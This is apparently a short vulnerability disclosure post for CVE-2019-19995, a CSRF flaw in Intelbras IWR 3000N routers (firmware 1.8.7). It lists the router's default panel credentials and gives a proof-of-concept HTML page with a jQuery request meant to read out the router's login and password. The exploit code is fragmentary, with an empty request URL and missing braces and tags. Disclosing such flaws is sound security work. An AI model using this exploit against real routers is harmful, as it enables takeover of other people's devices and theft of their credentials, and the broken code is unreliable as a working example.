CSRF — CVE-2019–19995

Rafael Silva
1 min readDec 26, 2019


A CSRF issue was discovered on Intelbras IWR 3000N 1.8.7 devices, leading to complete control of the router, as demonstrated by v1/system/user.

Proof Of Concept

First Step —

Login in the panel of router, (admin:admin123):

Second Step —

Create a page for the CSRF attack. As per example below.

<title>IWR 3000N - CSRF on Exploit </title>
<button onclick="exploit()">Exploit Button!</button>
<p>Click to get the login.</p>
function exploit(){
$.get( "" )
.done(( data ) => {
alert( data );
.fail(function( err, status) {
alert( status );
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

Third Step —

By clicking on the “Exploit” button, you have access to login and password.

Video —


